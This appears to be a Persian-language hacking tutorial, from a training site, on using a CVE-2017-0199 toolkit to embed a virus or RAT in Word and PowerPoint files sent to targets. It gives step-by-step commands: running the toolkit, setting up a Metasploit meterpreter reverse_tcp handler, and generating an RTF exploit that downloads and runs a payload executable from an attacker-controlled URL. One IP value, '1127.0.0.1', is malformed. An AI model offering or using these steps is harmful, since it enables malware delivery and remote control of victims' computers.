هک با افیس ( ابزار و اکسپلویت بایند با DOC )
اموزش تست نفوذ و امنیت سیستم با استفاده از فایل های های مجموعه افیس و ترکیب ان با فایل ویروس یا رات
در ادامه اموزش هک افیس با مرجع اموزش هک و امنیت همراه باشید همراه با ابزار و اکسپلویت
هک با افیس
توضیحات ابزار هک با افیس
بسیاری از هکر ها برای نفوذ خود در یک سیستم از روش های مختلفی استفاده میکنن که یکی از این روش ها ارسال فایل از مجموعه افیس است
یعنی به طور مثال با ارسال فایل .docx که یک فایل ورد است اقدام به هک میکند با اجرای فایل ورد هم ویروس اجرا خواهد شد و هم فایل اصلی
ما در این اموزش قصد داریم با استفاده از این اسیب پذیری مجموعه افیس ترکیب فایل مخرب با فایل ورد را اموزش دهیم
ابزاری که معرفی خواهیم کرد با استفاده از اسیب پذیری ثبت شده CVE-2017-0199 کار میکند و قادر است به سادگی بدون پیچیدگی زیاد فایل را ترکیب کند
امکان کارکرد این اکسپلویت تا مجموعه افیس چه سالی عمل میکند ؟
- 2007
- 2010
- 2013
- 2016
امکانات ابزار تست نفوذ با مجموعه افیس
- امکان استفاده از پسوند .ppsx
- مکان استفاده از پسوند .doc
- امکان ترکیب با فایل .exe
- امکان ترکیب با .hta
- انتخاب پورت اتصال
- اجرای ابزار در هر سیستم عامل
- استفاده در متاسپلویت
اموزش نصب و اجرا
در ابتدا برای نصب این ابزار لینک دانلود ابزار را از بخش دانلود در اخر اموزش دریافت کنید
سپس در دستور زیر لینک ابزار را جایگزین کلمه Link کنید و دستور را وارد کنید
git clone Link
با دستور زیر وارد پوشه دانلود شده شوید
cd CVE-2017-0199
حال در صورتی که پایتون 2.7 رانصب شده دارید با دستور زیر ابزار را اجرا کنید
python cve-2017-0199_toolkit.py
برای مشاهده سویچ های راهنما از سویچ -h استفاده کنید
python cve-2017-0199_toolkit.py -h
اموزش ساخت پبلود و استفاده از ابزار برای ترکیب پیلود با مجموعه افیس
برای ساخت پبلود با دستور زیر متاسپلویت را اجرا کنید
msfconsole
و به مسیر اکسپلویت بروید
use multi/handler
پیلود مورد نظر را انتخاب کنید
set PAYLOAD windows/meterpreter/reverse_tcp
ای پی سیستم را وارد کنید
set LHOST 1127.0.0.1
و با دستور run پیلود ایجاد خواهد شد
حال با دستور زیر اکسپلویت را اجرا و بر روی پیلود اعمال کنید
دقت داشته باشید در قسمتی که ادرس فایل و ای پی داده شده است ادرس درست سیستم خود را وارد کنید
python cve-2017-0199_toolkit.py -M exp -t RTF -e http://127.0.0.1/payload.exe -l /tmp/payload.exe
دانلود ابزار هک با افیس
[ برای درافت فایل وارد شوید و یا ثبت نام کنید! ]
موفق و پیروز باشید